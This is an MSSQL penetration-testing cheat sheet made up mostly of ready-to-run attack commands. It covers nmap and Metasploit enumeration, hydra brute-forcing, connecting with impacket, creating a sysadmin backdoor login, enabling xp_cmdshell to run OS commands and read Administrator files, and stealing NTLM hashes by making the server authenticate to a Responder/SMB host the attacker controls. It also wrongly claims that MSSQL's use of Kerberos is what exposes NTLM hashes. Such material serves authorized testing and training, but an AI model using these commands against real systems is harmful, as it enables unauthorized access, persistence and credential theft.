MSSQL (Microsoft SQL) Pentesting

MSSQL is a relational database management system. A default port is 1433.

Enumeration

nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
nmap --script ms-sql-* -p 1433 <target-ip>

# Metasploit
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

Brute Force Credentials

hydra -L usernames.txt –p password <target-ip> mssql
hydra -l username –P passwords.txt <target-ip> mssql

Connect

# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database

Commands

# Get all users
> SELECT * FROM sys.database_principals

# Switch to the database
> USE <database>

# Get databases
> SELECT * FROM master.dbo.sysdatabases

# List tables
> SELECT * FROM information_schema.tables

# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>

# Get the version of MSSQL
> SELECT @@version

# Check if the current user have permission to execute OS command
> USE master
> EXEC sp_helprotect 'xp_cmdshell'

# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers

# Create a new user with sysadmin privilege
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'

# Get current username
> SELECT user_name()

Spawn a Windows Command Shell and Run Commands using Impacket

If we connected MSSQL using impacket, we can exeucte the Windows Shell Commands by "enable_xp_cmdshell".

Enable/Disable a Windows Shell

> enable_xp_cmdshell
> disable_xp_cmdshell

Commands

We can execute commands the same as Windows Command Prompt.

# Get current user
> xp_cmdshell whoami

# Show files and directories
> xp_cmdshell dir
> xp_cmdshell dir \Users
# Show hidden files
> xp_cmdshell dir /a

# Get current directory
> xp_cmdshell cd

# Get contents of file
> xp_cmdshell more \Users\Administrator\example.txt
> xp_cmdshell type \Users\Administrator\example.txt

Privilege Escalation

msfconsole
msf> use exploit/windows/mssql/mssql_linkcrawler

Get NTLM Hash

MSSQL uses Keberos to authenticate users so we can retrieve the NTLM hash.

1. Start SMB Server and Responder

First we need to start a SMB server and Responder in each terminal.

# In terminal 1
sudo responder -I <interface>

# In terminal 2
sudo impacket-smbserver share ./ -smb2support

# In terminal 3
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

2. Execute with Metasploit

In msfconsole, select the following module.

We need to set the “SMBPROXY” option to the Responder IP (this ip is displayed when starting Responder in terminal).

msfconsole
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
msf> set rhosts <target_ip>
msf> set username <username>
msf> set password <password>
msf> set smbproxy <responder_ip>
msf> run

When executing, we can see the NTLM hash in the terminal where SMB server is running.